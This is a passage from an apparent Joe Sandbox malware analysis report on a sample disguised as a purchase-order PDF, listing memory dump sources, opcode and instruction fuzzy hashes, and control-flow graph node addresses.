                                                                                  • Snapshot File: hcaresult_8_2_1520000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 2889b61ee798f9faed80328eb7da4da823260659d8a58104a3f0676ee49e9f24
                                                                                  • Instruction ID: 4c27eaef77d85b9ff2e3ee89b285f4d49beb1deb5d991fb3d4b368344fdac1d2
                                                                                  • Opcode Fuzzy Hash: 2889b61ee798f9faed80328eb7da4da823260659d8a58104a3f0676ee49e9f24
                                                                                  • Instruction Fuzzy Hash: ED81B375E00218DFEB14DFAAD984A9DBBF2BF89300F14C06AE419AB365DB709941CF51
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.3880758987.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_1520000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 8664ddd0d3d977a32c3eaadebc4bcd1439f00515cc276244801447460c94c939
                                                                                  • Instruction ID: da7ab558a4f7d3ad99eb2ebd57fa72ffb84a717653472d605033f1cbc9ada7a1
                                                                                  • Opcode Fuzzy Hash: 8664ddd0d3d977a32c3eaadebc4bcd1439f00515cc276244801447460c94c939
                                                                                  • Instruction Fuzzy Hash: D581B575E00218CFEB54DFAAD984A9DBBF2BF89300F24C069E419AB365DB349941CF51
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.3880758987.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_1520000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: ffca3a5737acc6760a7d7de9eec27c7537c257ca4f71ba4c8b43c29e86cfb725
                                                                                  • Instruction ID: 78bde544aec7b87eba8a877c5ea67863ddfa36088ddb4d8c452e7abd7bf473c0
                                                                                  • Opcode Fuzzy Hash: ffca3a5737acc6760a7d7de9eec27c7537c257ca4f71ba4c8b43c29e86cfb725
                                                                                  • Instruction Fuzzy Hash: 7A519975E00218DFDB18DFAAD544A9DBBB2FF89310F14D12AE815AB365DB315842CF14
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.3880758987.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_1520000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: e70d4bee9da02c79a302abdb1bc473825a968b25c9013f4c90f481d65ec2bcc6
                                                                                  • Instruction ID: 77e5dd808d803d3d29243eb4ce881153953558f4b20ef7465024a204ab73f776
                                                                                  • Opcode Fuzzy Hash: e70d4bee9da02c79a302abdb1bc473825a968b25c9013f4c90f481d65ec2bcc6
                                                                                  • Instruction Fuzzy Hash: B2518575E00218DFDB18DFAAD594A9DBBB2FF89700F249029E815AB3A4DB315842CF14

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1049 5c6992c 1050 5c699eb-5c699fc 1049->1050 1051 5c69a03-5c69a0c 1050->1051 1052 5c699fe 1050->1052 1054 5c69a12-5c69a25 1051->1054 1055 5c697e3-5c69808 1051->1055 1052->1051 1058 5c69a27 1054->1058 1059 5c69a2c-5c69a47 1054->1059 1056 5c6980f-5c69846 1055->1056 1057 5c6980a 1055->1057 1067 5c6984d-5c6987f 1056->1067 1068 5c69848 1056->1068 1057->1056 1058->1059 1060 5c69a4e-5c69a62 1059->1060 1061 5c69a49 1059->1061 1064 5c69a64 1060->1064 1065 5c69a69-5c69a7f LdrInitializeThunk 1060->1065 1061->1060 1064->1065 1069 5c69a81-5c69b7e 1065->1069 1074 5c698e3-5c698f6 1067->1074 1075 5c69881-5c698a6 1067->1075 1068->1067 1072 5c69b86-5c69b90 1069->1072 1073 5c69b80-5c69b85 1069->1073 1073->1072 1079 5c698fd-5c69922 1074->1079 1080 5c698f8 1074->1080 1076 5c698ad-5c698db 1075->1076 1077 5c698a8 1075->1077 1076->1074 1077->1076 1083 5c69924-5c69925 1079->1083 1084 5c69931-5c69969 1079->1084 1080->1079 1083->1054 1085 5c69970-5c699d1 call 5c69328 1084->1085 1086 5c6996b 1084->1086 1092 5c699d3 1085->1092 1093 5c699d8-5c699ea 1085->1093 1086->1085 1092->1093 1093->1050
                                                                                  APIs
                                                                                  • LdrInitializeThunk.NTDLL(00000000), ref: 05C69A6E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.3896059789.0000000005C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C60000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_5c60000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 16336c1b1410933c850ebba24afe6379955b00db17103661b8d07783aeee173e
                                                                                  • Instruction ID: 2f7a5075abc85751fee2f766aab56a029ae01386e98d7ae75b6fc9aed8755bac
                                                                                  • Opcode Fuzzy Hash: 16336c1b1410933c850ebba24afe6379955b00db17103661b8d07783aeee173e
                                                                                  • Instruction Fuzzy Hash: 84115978E042098FDB14DBA9D8C4EADB7F5FF88304F148565E848E7242D770DA42CB50

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1534 152aef0-152aef1 1535 152af72-152af75 1534->1535 1536 152aef3-152aef5 1534->1536 1537 152af76-152afc1 1535->1537 1536->1537 1538 152aef7-152aefa 1536->1538 1544 152afca-152afd3 1537->1544 1539 152aefc 1538->1539 1540 152aefd-152af40 1538->1540 1539->1540 1546 152af42-152af4d 1540->1546 1547 152af53-152af5e 1540->1547 1546->1547 1552 152afd6-152b028 1546->1552 1550 152af64-152af70 1547->1550 1551 152b02f-152b051 1547->1551 1550->1535 1559 152b0d2-152b0d8 1551->1559 1560 152b053-152b059 1551->1560 1552->1551 1561 152b0da-152b0e2 1559->1561 1560->1561 1562 152b05b-152b06b 1560->1562 1566 152b1ab 1561->1566 1567 152b0e8-152b0ed 1561->1567 1564 152b072-152b074 1562->1564 1565 152b06d call 1527c88 1562->1565 1570 152b076-152b083 1564->1570 1571 152b085-152b093 1564->1571 1565->1564 1572 152b1b0-152b1ba 1566->1572 1567->1566 1569 152b0f3-152b112 1567->1569 1581 152b114-152b11c 1569->1581 1582 152b15b-152b16f 1569->1582 1578 152b0a3-152b0a6 1570->1578 1579 152b0a1 1571->1579 1580 152b095-152b09f 1571->1580 1583 152b1bc 1572->1583 1584 152b1bd-152b1c1 1572->1584 1579->1578 1580->1578 1581->1566 1586 152b122-152b125 1581->1586 1594 152b171-152b177 1582->1594 1595 152b19e-152b1a8 1582->1595 1583->1584 1587 152b242-152b250 1584->1587 1588 152b1c3-152b1ef 1584->1588 1586->1566 1591 152b12b-152b14a 1586->1591 1601 152b256-152b259 1587->1601 1602 152b494 1587->1602 1592 152b1f1-152b1f4 1588->1592 1593 152b1f7-152b1ff 1588->1593 1591->1566 1615 152b14c-152b152 1591->1615 1592->1593 1596 152b201-152b207 1593->1596 1597 152b267-152b26e 1593->1597 1594->1572 1598 152b179-152b196 1594->1598 1596->1597 1605 152b209-152b20f 1596->1605 1603 152b373-152b37c 1597->1603 1604 152b274-152b27b 1597->1604 1598->1595 1601->1602 1606 152b25f-152b265 1601->1606 1613 152b499-152b4a9 1602->1613 1608 152b386-152b389 1603->1608 1609 152b37e-152b384 1603->1609 1610 152b281-152b289 1604->1610 1611 152b32a-152b330 1604->1611 1612 152b215-152b222 1605->1612 1605->1613 1606->1596 1606->1597 1608->1602 1617 152b38f-152b39d 1608->1617 1609->1608 1616 152b3a0-152b3a4 1609->1616 1610->1602 1618 152b28f-152b298 1610->1618 1611->1613 1620 152b336-152b340 1611->1620 1612->1613 1619 152b228-152b239 1612->1619 1632 152b52a-152b52b 1613->1632 1633 152b4ab-152b4cf 1613->1633 1615->1572 1621 152b154-152b158 1615->1621 1623 152b427-152b42b 1616->1623 1624 152b3aa-152b3b3 1616->1624 1617->1616 1618->1613 1622 152b29e-152b2d1 1618->1622 1619->1587 1620->1613 1626 152b346-152b362 1620->1626 1621->1582 1668 152b2d3 1622->1668 1669 152b31b-152b328 1622->1669 1629 152b48a-152b491 1623->1629 1630 152b42d-152b436 1623->1630 1624->1623 1631 152b3b5-152b3bb 1624->1631 1658 152b36a-152b36d 1626->1658 1630->1602 1636 152b438-152b43f 1630->1636 1631->1613 1637 152b3c1-152b3cb 1631->1637 1639 152b559-152b56a 1632->1639 1640 152b52d-152b53a call 152abe0 1632->1640 1650 152b4d1-152b4dc 1633->1650 1651 152b4de-152b4e2 1633->1651 1636->1629 1641 152b441 1636->1641 1637->1613 1642 152b3d1-152b3de 1637->1642 1640->1639 1653 152b53c-152b54b 1640->1653 1648 152b444-152b44c 1641->1648 1642->1613 1649 152b3e4-152b40f 1642->1649 1656 152b480-152b483 1648->1656 1657 152b44e-152b45a 1648->1657 1649->1613 1683 152b415-152b41d 1649->1683 1650->1651 1654 152b4f4 1651->1654 1655 152b4e4-152b4f2 1651->1655 1653->1639 1671 152b54d-152b557 1653->1671 1659 152b4f6-152b4f8 1654->1659 1655->1659 1656->1602 1660 152b485-152b488 1656->1660 1657->1613 1662 152b45c-152b478 1657->1662 1658->1602 1658->1603 1666 152b4fa-152b4fc 1659->1666 1667 152b4fe-152b506 1659->1667 1660->1629 1660->1648 1662->1656 1666->1667 1672 152b508-152b51a 1667->1672 1673 152b529 1667->1673 1674 152b2d6-152b2dc 1668->1674 1669->1658 1671->1639 1672->1673 1684 152b51c-152b527 1672->1684 1673->1632 1674->1613 1677 152b2e2-152b303 1674->1677 1677->1602 1688 152b309-152b30d 1677->1688 1683->1602 1685 152b41f-152b425 1683->1685 1684->1673 1685->1623 1685->1631 1688->1602 1689 152b313-152b319 1688->1689 1689->1669 1689->1674
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.3880758987.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_1520000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 8
                                                                                  • API String ID: 0-4194326291
                                                                                  • Opcode ID: 22a5ce9f8b56bb50999ea6de6d3369d4818485c2136439f202a580231c06687b
                                                                                  • Instruction ID: b7b8ba4df8e0689296ec56b82965a7513a4f22c488af9946913e6a781c78c016
                                                                                  • Opcode Fuzzy Hash: 22a5ce9f8b56bb50999ea6de6d3369d4818485c2136439f202a580231c06687b
                                                                                  • Instruction Fuzzy Hash: 9F71D176B002148FDB15CF68C844AAEBBB6BFC9210F248569E526DB3D5DB349C06CB90

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 2033 152e007-152e012 2034 152e014 2033->2034 2035 152e015-152e022 2033->2035 2034->2035 2036 152e024 2035->2036 2037 152e029-152e02a call 152e8e8 2035->2037 2036->2037 2038 152e030-152e099 2037->2038 2054 152e0a0-152e0d1 call 152f71f 2038->2054 2062 152e0d8 2054->2062 2063 152e0df 2062->2063 2064 152e0e6-152e0ed 2063->2064 2066 152e0f4-152e0fb 2064->2066 2068 152e102-152e110 2066->2068 2071 152e117-152e11e 2068->2071 2073 152e125 2071->2073 2074 152e12c 2073->2074 2075 152e133 2074->2075 2076 152e13a 2075->2076 2077 152e141 2076->2077 2078 152e148 2077->2078 2079 152e14f-152e156 2078->2079 2081 152e15d-152e164 2079->2081 2083 152e16b 2081->2083 2084 152e172-152e179 2083->2084 2086 152e180 2084->2086 2087 152e187 2086->2087 2088 152e18e 2087->2088 2089 152e195-152e19c 2088->2089 2091 152e1a3-152e1b1 2089->2091 2094 152e1b8 2091->2094 2095 152e1bf-152e1c6 2094->2095 2097 152e1cd-152e1d4 2095->2097 2099 152e1db-152e1e2 2097->2099 2101 152e1e9 2099->2101 2102 152e1f0 2101->2102 2103 152e1f7 2102->2103 2104 152e1fe 2103->2104 2105 152e205 2104->2105 2106 152e20c-152e213 2105->2106 2108 152e21a 2106->2108 2109 152e221-152e22f 2108->2109 2112 152e236-152e23d 2109->2112 2114 152e244 2112->2114 2115 152e24b-152e252 2114->2115 2117 152e259 2115->2117 2118 152e260 2117->2118 2119 152e267-152e275 2118->2119 2122 152e27c-152e283 2119->2122 2124 152e28a 2122->2124 2125 152e291 2124->2125 2126 152e298-152e29f 2125->2126 2128 152e2a6-152e2ad 2126->2128 2130 152e2b4-152e2bb 2128->2130 2132 152e2c2-152e2c9 2130->2132 2134 152e2d0-152e2d7 2132->2134 2136 152e2de-152e2f3 2134->2136 2140 152e2fa-152e301 2136->2140 2142 152e308 2140->2142 2143 152e30f-152e316 2142->2143 2145 152e31d-152e324 2143->2145 2147 152e32b-152e332 2145->2147 2149 152e339 2147->2149 2150 152e340 2149->2150 2151 152e347-152e34e 2150->2151 2153 152e355-152e35c 2151->2153 2155 152e363-152e36a 2153->2155 2157 152e371-152e378 2155->2157 2159 152e37f-152e386 2157->2159 2161 152e38d 2159->2161 2162 152e394 2161->2162 2163 152e39b-152e3a2 2162->2163 2165 152e3a9-152e3b7 2163->2165 2168 152e3be 2165->2168 2169 152e3c5-152e3cc 2168->2169 2171 152e3d3 2169->2171 2172 152e3da 2171->2172 2173 152e3e1 2172->2173 2174 152e3e8-152e3f6 2173->2174 2177 152e3fd-152e412 2174->2177 2181 152e419-152e420 2177->2181 2183 152e427-152e4f9 2181->2183 2214 152e500-152e507 2183->2214 2216 152e50e-152e515 2214->2216 2218 152e51c 2216->2218 2219 152e523-152e538 2218->2219 2223 152e53f 2219->2223 2224 152e546-152e60a 2223->2224 2253 152e611-152e618 2224->2253 2359 152e619 call 5c6fc5f 2253->2359 2360 152e619 call 5c6fc68 2253->2360 2255 152e61f 2256 152e626 2255->2256 2257 152e62d-152e63b 2256->2257 2260 152e642 2257->2260 2261 152e649-152e6d5 2260->2261 2282 152e6dc 2261->2282 2283 152e6e3-152e71b 2282->2283 2292 152e722-152e729 2283->2292 2294 152e730-152e73e 2292->2294 2297 152e745 2294->2297 2298 152e74c-152e82c 2297->2298 2331 152e833 2298->2331 2332 152e83a-152e848 2331->2332 2335 152e84f 2332->2335 2336 152e856 2335->2336 2337 152e85d-152e86b 2336->2337 2340 152e872-152e879 2337->2340 2342 152e880-152e8aa 2340->2342 2349 152e8b1-152e8c6 2342->2349 2353 152e8cd 2349->2353 2354 152e8d4 2353->2354 2355 152e8db 2354->2355 2356 152e8e2-152e8e5 2355->2356 2359->2255 2360->2255
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.3880758987.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_1520000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: e41454a22b9422e5bd1cdc7a9dcc880f6018ca6f55df1107acd3b1696a3ceb1a
                                                                                  • Instruction ID: 0b53e13cd91c8c0420d0a83301117621f7c46e92ba37858819107520b9910395
                                                                                  • Opcode Fuzzy Hash: e41454a22b9422e5bd1cdc7a9dcc880f6018ca6f55df1107acd3b1696a3ceb1a
                                                                                  • Instruction Fuzzy Hash: A0129A3C0212429FE6606B38F5AE16EBB70FB4F32B7066C45E16F8945DDB78044DAB61

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 2361 152e018-152e022 2362 152e024 2361->2362 2363 152e029-152e618 call 152e8e8 call 152f71f 2361->2363 2362->2363 2683 152e619 call 5c6fc5f 2363->2683 2684 152e619 call 5c6fc68 2363->2684 2581 152e61f-152e8db 2682 152e8e2-152e8e5 2581->2682 2683->2581 2684->2581
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.3880758987.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_1520000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 14b48633b17f0724e579702237317be1e880560236d1f3bfc0f3861e3ba463b9
                                                                                  • Instruction ID: aa69ff355d4739cb2ecc82baafc240281800d4616d15b1345b7296bb377f22c4
                                                                                  • Opcode Fuzzy Hash: 14b48633b17f0724e579702237317be1e880560236d1f3bfc0f3861e3ba463b9
                                                                                  • Instruction Fuzzy Hash: 3412993C0212429FA6606B38F5AE16EBB71FB4F32B7066C41E12F8944DDB78044DAB61

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 2687 1520c8f-1520c91 2688 1520c94 2687->2688 2689 1520c95-1520c9a 2687->2689 2688->2689 2690 1520c9c 2689->2690 2691 1520c9d-1520cc0 2689->2691 2690->2691 2693 1520cc2 2691->2693 2694 1520cc7-1520cdd call 1520780 2691->2694 2693->2694 2697 1520ce2 2694->2697 2698 1520cee-152104e call 1520780 * 13 2697->2698 2772 1521056-152105f 2698->2772 2879 1521062 call 15227f0 2772->2879 2880 1521062 call 1522790 2772->2880 2773 1521068-152107d 2883 1521080 call 1523cc0 2773->2883 2884 1521080 call 1523b95 2773->2884 2775 1521086-152108f 2885 1521092 call 15241a0 2775->2885 2886 1521092 call 1524285 2775->2886 2887 1521092 call 1523e09 2775->2887 2776 1521098-15210c2 2779 15210cb-15210ce call 1525362 2776->2779 2780 15210d4-15210fe 2779->2780 2783 1521107-152110a call 152c146 2780->2783 2784 1521110-152113a 2783->2784 2787 1521143-1521146 call 152c468 2784->2787 2788 152114c-1521176 2787->2788 2791 152117f-1521182 call 152c738 2788->2791 2792 1521188-15211b2 2791->2792 2795 15211bb-15211be call 152ca08 2792->2795 2796 15211c4-15211f7 2795->2796 2799 1521203-1521209 call 152ccd8 2796->2799 2800 152120f-152124b 2799->2800 2803 1521257-152125d call 152cfac 2800->2803 2804 1521263-152129f 2803->2804 2807 15212ab-15212b1 call 152d278 2804->2807 2808 15212b7-15213d2 2807->2808 2821 15213de-15213f0 call 1525362 2808->2821 2822 15213f6-152145c 2821->2822 2827 1521467-1521473 call 152d548 2822->2827 2828 1521479-1521485 2827->2828 2829 1521490-152149c call 152d548 2828->2829 2830 15214a2-15214ae 2829->2830 2831 15214b9-15214c5 call 152d548 2830->2831 2832 15214cb-15214d7 2831->2832 2833 15214e2-15214ee call 152d548 2832->2833 2834 15214f4-1521500 2833->2834 2835 152150b-1521517 call 152d548 2834->2835 2836 152151d-1521529 2835->2836 2837 1521534-152153a 2836->2837 2881 1521540 call 152d6d4 2837->2881 2882 1521540 call 152d548 2837->2882 2838 1521546-1521552 2839 152155d-1521569 call 152d548 2838->2839 2840 152156f-152158c 2839->2840 2842 1521597-15215a3 call 152d548 2840->2842 2843 15215a9-15215b5 2842->2843 2844 15215c0-15215cc call 152d548 2843->2844 2845 15215d2-15215de 2844->2845 2846 15215e9-15215f5 call 152d548 2845->2846 2847 15215fb-1521607 2846->2847 2848 1521612-152161e call 152d548 2847->2848 2849 1521624-1521630 2848->2849 2850 152163b-1521647 call 152d548 2849->2850 2851 152164d-1521659 2850->2851 2852 1521664-1521670 call 152d548 2851->2852 2853 1521676-1521682 2852->2853 2854 152168d-1521699 call 152d548 2853->2854 2855 152169f-15216ab 2854->2855 2856 15216b6-15216c2 call 152d548 2855->2856 2857 15216c8-15216d4 2856->2857 2858 15216df-15216eb call 152d548 2857->2858 2859 15216f1-15217aa 2858->2859 2879->2773 2880->2773 2881->2838 2882->2838 2883->2775 2884->2775 2885->2776 2886->2776 2887->2776
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.3880758987.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_1520000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: b7472a08890144bd4075cf8f8128855a1ba3e850593fa0047409965c10c81afd
                                                                                  • Instruction ID: 54c9ceb795dcd9ca13ca2718b518783c46c325c2fdad636d4ca26c427a98a300
                                                                                  • Opcode Fuzzy Hash: b7472a08890144bd4075cf8f8128855a1ba3e850593fa0047409965c10c81afd
                                                                                  • Instruction Fuzzy Hash: CF620B74A01219CFCB64DF25E984A9DBBB2FB8C305F1046A5D819AB354DF346E85CF81

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 2902 1520ca0-1520cc0 2903 1520cc2 2902->2903 2904 1520cc7-152105f call 1520780 * 14 2902->2904 2903->2904 3088 1521062 call 15227f0 2904->3088 3089 1521062 call 1522790 2904->3089 2983 1521068-152107d 3092 1521080 call 1523cc0 2983->3092 3093 1521080 call 1523b95 2983->3093 2985 1521086-152108f 3094 1521092 call 15241a0 2985->3094 3095 1521092 call 1524285 2985->3095 3096 1521092 call 1523e09 2985->3096 2986 1521098-152153a call 1525362 call 152c146 call 152c468 call 152c738 call 152ca08 call 152ccd8 call 152cfac call 152d278 call 1525362 call 152d548 * 5 3090 1521540 call 152d6d4 2986->3090 3091 1521540 call 152d548 2986->3091 3048 1521546-15216eb call 152d548 * 10 3069 15216f1-15217aa 3048->3069 3088->2983 3089->2983 3090->3048 3091->3048 3092->2985 3093->2985 3094->2986 3095->2986 3096->2986
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.3880758987.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_1520000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: f9d3cc2dd9dd2e415e9ef2d25d8707ad34963a723a7bae5139f457cb9263603d
                                                                                  • Instruction ID: 48eff03d7fac274b822f75d05121991563b1fb3e9533b8312f096d20510bd98d
                                                                                  • Opcode Fuzzy Hash: f9d3cc2dd9dd2e415e9ef2d25d8707ad34963a723a7bae5139f457cb9263603d
                                                                                  • Instruction Fuzzy Hash: FF520A74A01219CFCB64DF25E984A9DBBB2FB8C305F1046A5D819AB354DF346E85CF81

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 3549 15276f1-15276f2 3550 15276f4 3549->3550 3551 15276f5-1527725 3549->3551 3550->3551 3552 1527b54-1527b58 3551->3552 3553 152772b-152774e 3551->3553 3554 1527b71-1527b7f 3552->3554 3555 1527b5a-1527b6e 3552->3555 3562 1527754-1527761 3553->3562 3563 15277fc-1527800 3553->3563 3560 1527bf0-1527c05 3554->3560 3561 1527b81-1527b96 3554->3561 3569 1527c07-1527c0a 3560->3569 3570 1527c0c-1527c19 3560->3570 3571 1527b98-1527b9b 3561->3571 3572 1527b9d-1527baa 3561->3572 3577 1527763-152776e 3562->3577 3578 1527770 3562->3578 3564 1527802-1527810 3563->3564 3565 1527848-1527851 3563->3565 3564->3565 3583 1527812-152782d 3564->3583 3573 1527c67 3565->3573 3574 1527857-1527861 3565->3574 3579 1527c1b-1527c56 3569->3579 3570->3579 3580 1527bac-1527bed 3571->3580 3572->3580 3584 1527c6c-1527c7a 3573->3584 3574->3552 3575 1527867-1527870 3574->3575 3581 1527872-1527877 3575->3581 3582 152787f-152788b 3575->3582 3585 1527772-1527774 3577->3585 3578->3585 3630 1527c5d-1527c64 3579->3630 3581->3582 3582->3584 3590 1527891-1527897 3582->3590 3612 152783b 3583->3612 3613 152782f-1527839 3583->3613 3601 1527c7c 3584->3601 3602 1527c7d-1527c82 3584->3602 3585->3563 3592 152777a-15277dc 3585->3592 3593 1527b3e-1527b42 3590->3593 3594 152789d-15278ad 3590->3594 3643 15277e2-15277f9 3592->3643 3644 15277de 3592->3644 3593->3573 3597 1527b48-1527b4e 3593->3597 3610 15278c1-15278c3 3594->3610 3611 15278af-15278bf 3594->3611 3597->3552 3597->3575 3601->3602 3603 1527c83-1527c84 3602->3603 3604 1527c85-1527c9c 3602->3604 3603->3604 3618 1527cb5-1527cbc 3604->3618 3619 1527c9e-1527cb4 3604->3619 3615 15278c6-15278cc 3610->3615 3611->3615 3616 152783d-152783f 3612->3616 3613->3616 3615->3593 3624 15278d2-15278e1 3615->3624 3616->3565 3625 1527841 3616->3625 3626 15278e7 3624->3626 3627 152798f-15279ba call 1527538 * 2 3624->3627 3625->3565 3632 15278ea-15278fb 3626->3632 3645 15279c0-15279c4 3627->3645 3646 1527aa4-1527abe 3627->3646 3632->3584 3633 1527901-1527913 3632->3633 3633->3584 3635 1527919-1527931 3633->3635 3699 1527933 call 1528055 3635->3699 3700 1527933 call 15280d8 3635->3700 3639 1527939-1527949 3639->3593 3642 152794f-1527952 3639->3642 3647 1527954-152795a 3642->3647 3648 152795c-152795f 3642->3648 3643->3563 3644->3643 3645->3593 3649 15279ca-15279ce 3645->3649 3646->3552 3668 1527ac4-1527ac8 3646->3668 3647->3648 3650 1527965-1527968 3647->3650 3648->3573 3648->3650 3653 15279d0-15279dd 3649->3653 3654 15279f6-15279fc 3649->3654 3655 1527970-1527973 3650->3655 3656 152796a-152796e 3650->3656 3671 15279df-15279ea 3653->3671 3672 15279ec 3653->3672 3658 1527a37-1527a3d 3654->3658 3659 15279fe-1527a02 3654->3659 3655->3573 3657 1527979-152797d 3655->3657 3656->3655 3656->3657 3657->3573 3664 1527983-1527989 3657->3664 3661 1527a49-1527a4f 3658->3661 3662 1527a3f-1527a43 3658->3662 3659->3658 3665 1527a04-1527a0d 3659->3665 3669 1527a51-1527a55 3661->3669 3670 1527a5b-1527a5d 3661->3670 3662->3630 3662->3661 3664->3627 3664->3632 3666 1527a0f-1527a14 3665->3666 3667 1527a1c-1527a32 3665->3667 3666->3667 3667->3593 3673 1527b04-1527b08 3668->3673 3674 1527aca-1527ad4 call 15263e0 3668->3674 3669->3593 3669->3670 3675 1527a92-1527a94 3670->3675 3676 1527a5f-1527a68 3670->3676 3677 15279ee-15279f0 3671->3677 3672->3677 3673->3630 3680 1527b0e-1527b12 3673->3680 3674->3673 3687 1527ad6-1527aeb 3674->3687 3675->3593 3678 1527a9a-1527aa1 3675->3678 3683 1527a77-1527a8d 3676->3683 3684 1527a6a-1527a6f 3676->3684 3677->3593 3677->3654 3680->3630 3685 1527b18-1527b25 3680->3685 3683->3593 3684->3683 3690 1527b27-1527b32 3685->3690 3691 1527b34 3685->3691 3687->3673 3696 1527aed-1527b02 3687->3696 3693 1527b36-1527b38 3690->3693 3691->3693 3693->3593 3693->3630 3696->3552 3696->3673 3699->3639 3700->3639
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.3880758987.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_1520000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: eee7c234432c0d0399e56e1015aceba84553537c19e7423bb9eea721b765f550
                                                                                  • Instruction ID: 46923dd62cd3dc20d1df947e9bf0df53d2fdca7167dbea74e272257711fdf44c
                                                                                  • Opcode Fuzzy Hash: eee7c234432c0d0399e56e1015aceba84553537c19e7423bb9eea721b765f550
                                                                                  • Instruction Fuzzy Hash: 5B127A32A002698FDB15CF68C884A9EBBF1FF9A314F148599E915EF2A1D730ED41CB50

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
